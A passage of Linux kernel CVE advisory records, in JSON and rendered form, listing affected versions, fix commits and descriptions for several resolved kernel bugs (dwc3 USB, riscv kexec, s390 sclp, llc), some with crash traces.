              "lessThan": "eca3f543f817da87c00d1a5697b473efb548204f",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "d2afc2bffec77316b90d530b07695e3f534df914",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "b72da4d89b97da71e056cc4d1429b2bc426a9c2f",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "111277b881def3153335acfe0d1f43e6cd83ac93",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "2189fd13c577d7881f94affc09c950a795064c4b",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "7bb11a75dd4d3612378b90e2a4aa49bdccea28ab",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "e23f6ad8d110bf632f7471482e10b43dc174fb72",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            },
            {
              "lessThan": "14e497183df28c006603cc67fd3797a537eef7b9",
              "status": "affected",
              "version": "9f8a67b65a49d0e35c6ca782136c84541d948a64",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/dwc3/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.8"
            },
            {
              "lessThan": "4.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.321",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.108",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.49",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.321",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.108",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.49",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.8",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: core: Prevent USB core invalid event buffer address access\n\nThis commit addresses an issue where the USB core could access an\ninvalid event buffer address during runtime suspend, potentially causing\nSMMU faults and other memory issues in Exynos platforms. The problem\narises from the following sequence.\n        1. In dwc3_gadget_suspend, there is a chance of a timeout when\n        moving the USB core to the halt state after clearing the\n        run/stop bit by software.\n        2. In dwc3_core_exit, the event buffer is cleared regardless of\n        the USB core\u0027s status, which may lead to an SMMU faults and\n        other memory issues. if the USB core tries to access the event\n        buffer address.\n\nTo prevent this hardware quirk on Exynos platforms, this commit ensures\nthat the event buffer address is not cleared by software  when the USB\ncore is active during runtime suspend by checking its status before\nclearing the buffer address."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:48.528Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/eca3f543f817da87c00d1a5697b473efb548204f"
        },
        {
          "url": "https://git.kernel.org/stable/c/d2afc2bffec77316b90d530b07695e3f534df914"
        },
        {
          "url": "https://git.kernel.org/stable/c/b72da4d89b97da71e056cc4d1429b2bc426a9c2f"
        },
        {
          "url": "https://git.kernel.org/stable/c/111277b881def3153335acfe0d1f43e6cd83ac93"
        },
        {
          "url": "https://git.kernel.org/stable/c/2189fd13c577d7881f94affc09c950a795064c4b"
        },
        {
          "url": "https://git.kernel.org/stable/c/7bb11a75dd4d3612378b90e2a4aa49bdccea28ab"
        },
        {
          "url": "https://git.kernel.org/stable/c/e23f6ad8d110bf632f7471482e10b43dc174fb72"
        },
        {
          "url": "https://git.kernel.org/stable/c/14e497183df28c006603cc67fd3797a537eef7b9"
        }
      ],
      "title": "usb: dwc3: core: Prevent USB core invalid event buffer address access",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46675",
    "datePublished": "2024-09-13T05:29:10.987Z",
    "dateReserved": "2024-09-11T15:12:18.247Z",
    "dateUpdated": "2026-01-05T10:52:48.528Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42140 (GCVE-0-2024-42140)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

riscv: kexec: Avoid deadlock in kexec crash path

Summary

In the Linux kernel, the following vulnerability has been resolved: riscv: kexec: Avoid deadlock in kexec crash path If the kexec crash code is called in the interrupt context, the machine_kexec_mask_interrupts() function will trigger a deadlock while trying to acquire the irqdesc spinlock and then deactivate irqchip in irq_set_irqchip_state() function. Unlike arm64, riscv only requires irq_eoi handler to complete EOI and keeping irq_set_irqchip_state() will only leave this possible deadlock without any use. So we simply remove it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/bb80a7911218bbab2…
	https://git.kernel.org/stable/c/653deee48a4682ea1…
	https://git.kernel.org/stable/c/7692c9b6baacdee37…
	https://git.kernel.org/stable/c/484dd545271d02d15…
	https://git.kernel.org/stable/c/c562ba719df570c98…

Impacted products

Vendor

Product

Version

Linux

Affected: 12f237200c169a8667cf9dca7a40df8d7917b9fd , < bb80a7911218bbab2a69b5db7d2545643ab0073d (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < 653deee48a4682ea17a05b96fb6842795ab5943c (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < 7692c9b6baacdee378435f58f19baf0eb69e4155 (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < 484dd545271d02d1571e1c6b62ea7df9dbe5e692 (git)
Affected: b17d19a5314a37f7197afd1a0200affd21a7227d , < c562ba719df570c986caf0941fea2449150bcbc4 (git)
Affected: 7594956fec8902dfc18150bf1dca0940cd4ad025 (git)

Linux

Affected: 6.1
Unaffected: 0 , < 6.1 (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:08.287Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bb80a7911218bbab2a69b5db7d2545643ab0073d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/653deee48a4682ea17a05b96fb6842795ab5943c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7692c9b6baacdee378435f58f19baf0eb69e4155"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/484dd545271d02d1571e1c6b62ea7df9dbe5e692"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c562ba719df570c986caf0941fea2449150bcbc4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42140",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:56.730173Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:09.207Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/riscv/kernel/machine_kexec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "bb80a7911218bbab2a69b5db7d2545643ab0073d",
              "status": "affected",
              "version": "12f237200c169a8667cf9dca7a40df8d7917b9fd",
              "versionType": "git"
            },
            {
              "lessThan": "653deee48a4682ea17a05b96fb6842795ab5943c",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "lessThan": "7692c9b6baacdee378435f58f19baf0eb69e4155",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "lessThan": "484dd545271d02d1571e1c6b62ea7df9dbe5e692",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "lessThan": "c562ba719df570c986caf0941fea2449150bcbc4",
              "status": "affected",
              "version": "b17d19a5314a37f7197afd1a0200affd21a7227d",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7594956fec8902dfc18150bf1dca0940cd4ad025",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/riscv/kernel/machine_kexec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.1"
            },
            {
              "lessThan": "6.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.82",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.0.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: kexec: Avoid deadlock in kexec crash path\n\nIf the kexec crash code is called in the interrupt context, the\nmachine_kexec_mask_interrupts() function will trigger a deadlock while\ntrying to acquire the irqdesc spinlock and then deactivate irqchip in\nirq_set_irqchip_state() function.\n\nUnlike arm64, riscv only requires irq_eoi handler to complete EOI and\nkeeping irq_set_irqchip_state() will only leave this possible deadlock\nwithout any use. So we simply remove it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:44.900Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/bb80a7911218bbab2a69b5db7d2545643ab0073d"
        },
        {
          "url": "https://git.kernel.org/stable/c/653deee48a4682ea17a05b96fb6842795ab5943c"
        },
        {
          "url": "https://git.kernel.org/stable/c/7692c9b6baacdee378435f58f19baf0eb69e4155"
        },
        {
          "url": "https://git.kernel.org/stable/c/484dd545271d02d1571e1c6b62ea7df9dbe5e692"
        },
        {
          "url": "https://git.kernel.org/stable/c/c562ba719df570c986caf0941fea2449150bcbc4"
        }
      ],
      "title": "riscv: kexec: Avoid deadlock in kexec crash path",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42140",
    "datePublished": "2024-07-30T07:46:34.260Z",
    "dateReserved": "2024-07-29T15:50:41.189Z",
    "dateUpdated": "2025-11-03T22:02:08.287Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41068 (GCVE-0-2024-41068)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2026-01-05 10:37

Title

s390/sclp: Fix sclp_init() cleanup on failure

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/sclp: Fix sclp_init() cleanup on failure If sclp_init() fails it only partially cleans up: if there are multiple failing calls to sclp_init() sclp_state_change_event will be added several times to sclp_reg_list, which results in the following warning: ------------[ cut here ]------------ list_add double add: new=000003ffe1598c10, prev=000003ffe1598bf0, next=000003ffe1598c10. WARNING: CPU: 0 PID: 1 at lib/list_debug.c:35 __list_add_valid_or_report+0xde/0xf8 CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.10.0-rc3 Krnl PSW : 0404c00180000000 000003ffe0d6076a (__list_add_valid_or_report+0xe2/0xf8) R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 RI:0 EA:3 ... Call Trace: [<000003ffe0d6076a>] __list_add_valid_or_report+0xe2/0xf8 ([<000003ffe0d60766>] __list_add_valid_or_report+0xde/0xf8) [<000003ffe0a8d37e>] sclp_init+0x40e/0x450 [<000003ffe00009f2>] do_one_initcall+0x42/0x1e0 [<000003ffe15b77a6>] do_initcalls+0x126/0x150 [<000003ffe15b7a0a>] kernel_init_freeable+0x1ba/0x1f8 [<000003ffe0d6650e>] kernel_init+0x2e/0x180 [<000003ffe000301c>] __ret_from_fork+0x3c/0x60 [<000003ffe0d759ca>] ret_from_fork+0xa/0x30 Fix this by removing sclp_state_change_event from sclp_reg_list when sclp_init() fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cf521049fcd07071e…
	https://git.kernel.org/stable/c/79b4be70d5a160969…
	https://git.kernel.org/stable/c/0a31b3fdc7e735c4f…
	https://git.kernel.org/stable/c/be0259796d0b76bbc…
	https://git.kernel.org/stable/c/6434b33faaa063df5…

Impacted products

Vendor

Product

Version

Linux

Affected: 8bc00c04d87ee151fb8fe18ed7e7af8c785843f2 , < cf521049fcd07071ed42dc9758fce7d5ee120ec6 (git)
Affected: 8bc00c04d87ee151fb8fe18ed7e7af8c785843f2 , < 79b4be70d5a160969b805f638ac5b4efd0aac7a3 (git)
Affected: 8bc00c04d87ee151fb8fe18ed7e7af8c785843f2 , < 0a31b3fdc7e735c4f8c65fe4339945c717ed6808 (git)
Affected: 8bc00c04d87ee151fb8fe18ed7e7af8c785843f2 , < be0259796d0b76bbc7461e12c186814a9e58244c (git)
Affected: 8bc00c04d87ee151fb8fe18ed7e7af8c785843f2 , < 6434b33faaa063df500af355ee6c3942e0f8d982 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:17.751Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a778987afc36d5dc02a1f82d352a81edcaf7eb83"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/455a6653d8700a81aa8ed2b6442a3be476007090"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e51db7ab71b89dc5a17068f5e201c69f13a4c9a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf521049fcd07071ed42dc9758fce7d5ee120ec6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79b4be70d5a160969b805f638ac5b4efd0aac7a3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0a31b3fdc7e735c4f8c65fe4339945c717ed6808"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be0259796d0b76bbc7461e12c186814a9e58244c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6434b33faaa063df500af355ee6c3942e0f8d982"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41068",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:46.444784Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:01.200Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/char/sclp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cf521049fcd07071ed42dc9758fce7d5ee120ec6",
              "status": "affected",
              "version": "8bc00c04d87ee151fb8fe18ed7e7af8c785843f2",
              "versionType": "git"
            },
            {
              "lessThan": "79b4be70d5a160969b805f638ac5b4efd0aac7a3",
              "status": "affected",
              "version": "8bc00c04d87ee151fb8fe18ed7e7af8c785843f2",
              "versionType": "git"
            },
            {
              "lessThan": "0a31b3fdc7e735c4f8c65fe4339945c717ed6808",
              "status": "affected",
              "version": "8bc00c04d87ee151fb8fe18ed7e7af8c785843f2",
              "versionType": "git"
            },
            {
              "lessThan": "be0259796d0b76bbc7461e12c186814a9e58244c",
              "status": "affected",
              "version": "8bc00c04d87ee151fb8fe18ed7e7af8c785843f2",
              "versionType": "git"
            },
            {
              "lessThan": "6434b33faaa063df500af355ee6c3942e0f8d982",
              "status": "affected",
              "version": "8bc00c04d87ee151fb8fe18ed7e7af8c785843f2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/char/sclp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/sclp: Fix sclp_init() cleanup on failure\n\nIf sclp_init() fails it only partially cleans up: if there are multiple\nfailing calls to sclp_init() sclp_state_change_event will be added several\ntimes to sclp_reg_list, which results in the following warning:\n\n------------[ cut here ]------------\nlist_add double add: new=000003ffe1598c10, prev=000003ffe1598bf0, next=000003ffe1598c10.\nWARNING: CPU: 0 PID: 1 at lib/list_debug.c:35 __list_add_valid_or_report+0xde/0xf8\nCPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.10.0-rc3\nKrnl PSW : 0404c00180000000 000003ffe0d6076a (__list_add_valid_or_report+0xe2/0xf8)\n           R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 RI:0 EA:3\n...\nCall Trace:\n [\u003c000003ffe0d6076a\u003e] __list_add_valid_or_report+0xe2/0xf8\n([\u003c000003ffe0d60766\u003e] __list_add_valid_or_report+0xde/0xf8)\n [\u003c000003ffe0a8d37e\u003e] sclp_init+0x40e/0x450\n [\u003c000003ffe00009f2\u003e] do_one_initcall+0x42/0x1e0\n [\u003c000003ffe15b77a6\u003e] do_initcalls+0x126/0x150\n [\u003c000003ffe15b7a0a\u003e] kernel_init_freeable+0x1ba/0x1f8\n [\u003c000003ffe0d6650e\u003e] kernel_init+0x2e/0x180\n [\u003c000003ffe000301c\u003e] __ret_from_fork+0x3c/0x60\n [\u003c000003ffe0d759ca\u003e] ret_from_fork+0xa/0x30\n\nFix this by removing sclp_state_change_event from sclp_reg_list when\nsclp_init() fails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:35.418Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cf521049fcd07071ed42dc9758fce7d5ee120ec6"
        },
        {
          "url": "https://git.kernel.org/stable/c/79b4be70d5a160969b805f638ac5b4efd0aac7a3"
        },
        {
          "url": "https://git.kernel.org/stable/c/0a31b3fdc7e735c4f8c65fe4339945c717ed6808"
        },
        {
          "url": "https://git.kernel.org/stable/c/be0259796d0b76bbc7461e12c186814a9e58244c"
        },
        {
          "url": "https://git.kernel.org/stable/c/6434b33faaa063df500af355ee6c3942e0f8d982"
        }
      ],
      "title": "s390/sclp: Fix sclp_init() cleanup on failure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41068",
    "datePublished": "2024-07-29T14:57:29.360Z",
    "dateReserved": "2024-07-12T12:17:45.630Z",
    "dateUpdated": "2026-01-05T10:37:35.418Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26636 (GCVE-0-2024-26636)

Vulnerability from cvelistv5 – Published: 2024-03-18 10:14 – Updated: 2025-05-04 08:52

Title

llc: make llc_ui_sendmsg() more robust against bonding changes

Summary

In the Linux kernel, the following vulnerability has been resolved: llc: make llc_ui_sendmsg() more robust against bonding changes syzbot was able to trick llc_ui_sendmsg(), allocating an skb with no headroom, but subsequently trying to push 14 bytes of Ethernet header [1] Like some others, llc_ui_sendmsg() releases the socket lock before calling sock_alloc_send_skb(). Then it acquires it again, but does not redo all the sanity checks that were performed. This fix: - Uses LL_RESERVED_SPACE() to reserve space. - Check all conditions again after socket lock is held again. - Do not account Ethernet header for mtu limitation. [1] skbuff: skb_under_panic: text:ffff800088baa334 len:1514 put:14 head:ffff0000c9c37000 data:ffff0000c9c36ff2 tail:0x5dc end:0x6c0 dev:bond0 kernel BUG at net/core/skbuff.c:193 ! Internal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP Modules linked in: CPU: 0 PID: 6875 Comm: syz-executor.0 Not tainted 6.7.0-rc8-syzkaller-00101-g0802e17d9aca-dirty #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : skb_panic net/core/skbuff.c:189 [inline] pc : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203 lr : skb_panic net/core/skbuff.c:189 [inline] lr : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203 sp : ffff800096f97000 x29: ffff800096f97010 x28: ffff80008cc8d668 x27: dfff800000000000 x26: ffff0000cb970c90 x25: 00000000000005dc x24: ffff0000c9c36ff2 x23: ffff0000c9c37000 x22: 00000000000005ea x21: 00000000000006c0 x20: 000000000000000e x19: ffff800088baa334 x18: 1fffe000368261ce x17: ffff80008e4ed000 x16: ffff80008a8310f8 x15: 0000000000000001 x14: 1ffff00012df2d58 x13: 0000000000000000 x12: 0000000000000000 x11: 0000000000000001 x10: 0000000000ff0100 x9 : e28a51f1087e8400 x8 : e28a51f1087e8400 x7 : ffff80008028f8d0 x6 